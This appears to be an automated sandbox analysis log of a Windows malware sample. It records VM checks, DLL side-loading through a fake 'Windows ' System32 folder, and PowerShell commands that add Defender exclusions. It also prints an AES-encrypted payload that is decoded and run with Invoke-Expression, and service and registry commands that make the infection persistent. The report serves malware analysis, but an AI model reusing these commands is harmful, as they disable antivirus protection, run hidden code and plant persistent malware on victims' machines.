    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\svchost.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FF9C550631D sldt word ptr [eax]34_2_00007FF9C550631D
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1432
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8470
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1474
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8347
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3509
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6206
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1900
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7912
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2828
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6961
    Source: C:\Windows \System32\printui.exeDropped PE file which has not been started: C:\Windows\System32\vcruntime140d.dllJump to dropped file
    Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Windows \System32\x249569.datJump to dropped file
    Source: C:\Program Files\7-Zip\7zFM.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7zE4809A201\rootdir\x249569.datJump to dropped file
    Source: C:\Windows \System32\printui.exeDropped PE file which has not been started: C:\Windows\System32\ucrtbased.dllJump to dropped file
    Source: C:\Windows\System32\svchost.exeAPI coverage: 0.5 %
    Source: C:\Windows\System32\OpenWith.exe TID: 6948Thread sleep count: 34 > 30Jump to behavior
    Source: C:\Windows\System32\svchost.exe TID: 6312Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2752Thread sleep count: 1432 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2752Thread sleep count: 8470 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1472Thread sleep time: -1844674407370954s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1212Thread sleep count: 1474 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1228Thread sleep count: 8347 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3132Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\console_zero.exe TID: 3408Thread sleep time: -30000s >= -30000s
    Source: C:\Windows\System32\timeout.exe TID: 1544Thread sleep count: 85 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5252Thread sleep count: 3509 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5252Thread sleep count: 6206 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1304Thread sleep time: -4611686018427385s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6624Thread sleep count: 1900 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6684Thread sleep count: 7912 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6584Thread sleep time: -2767011611056431s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1088Thread sleep count: 2828 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1088Thread sleep count: 6961 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6352Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_64946F50 GetSystemTimeAdjustment followed by cmp: cmp ecx, 03h and CTI: jle 64946F63h46_2_64946F50
    Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA4185014C GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,46_2_00007FFA4185014C
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA41850008 FindClose,FindFirstFileExW,GetLastError,46_2_00007FFA41850008
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\console_zero.exeThread delayed: delay time: 30000
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: svchost.exe, 0000000B.00000002.2314135054.000001F54E82B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: svchost.exe, 0000000B.00000002.2315993422.000001F54E84E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6b
    Source: svchost.exe, 0000000B.00000002.2314135054.000001F54E82B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
    Source: svchost.exe, 00000003.00000002.2339567614.00000150FCA64000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2321378970.00000150FB22F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: svchost.exe, 0000000B.00000002.2309415733.000001F54E80B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
    Source: svchost.exe, 0000000B.00000002.2322397815.000001F54E902000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
    Source: svchost.exe, 0000000B.00000002.2315993422.000001F54E84E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
    Source: svchost.exe, 0000002E.00000002.2347960506.00000224C243C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: svchost.exe, 0000000B.00000002.2319192112.000001F54E867000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000e1}
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_649461C0 IsDebuggerPresent,RaiseException,46_2_649461C0
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA3312B470 WSAStartup,WSACleanup,GetModuleHandleW,GetProcAddress,wcspbrk,LoadLibraryW,GetProcAddress,GetSystemDirectoryW,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,QueryPerformanceFrequency,51_2_00007FFA3312B470
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_64947650 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,46_2_64947650
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_6828C940 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,46_2_6828C940
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEAEE70 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,46_2_00007FFA2CEAEE70
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEAFA50 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,46_2_00007FFA2CEAFA50
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CF16630 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,46_2_00007FFA2CF16630
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CF16F94 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,46_2_00007FFA2CF16F94
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CF17178 SetUnhandledExceptionFilter,46_2_00007FFA2CF17178
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA41852770 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,46_2_00007FFA41852770
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA41866A2C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,46_2_00007FFA41866A2C
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA33146224 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,51_2_00007FFA33146224
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA331457A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,51_2_00007FFA331457A0
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA5112E24C IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,51_2_00007FFA5112E24C
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA5112D768 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,51_2_00007FFA5112D768

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Yara detected Powershell decode and execute
    Source: Yara matchFile source: amsi64_3740.amsi.csv, type: OTHER
    Adds a directory exclusion to Windows Defender
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';"
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'E:\';"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'E:\';"
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'F:\';"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'F:\';"
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';"
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'E:\';"
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'F:\';"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'E:\';"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'F:\';"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rootdir\x615759.bat" "Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\explorer.exe explorer "..\USB Drive"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy "C:\Windows\System32\printui.exe" "C:\Windows \System32" /YJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy "x249569.dat" "C:\Windows \System32" /YJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe" Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe" Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x338625\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x338625.dat" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start x338625
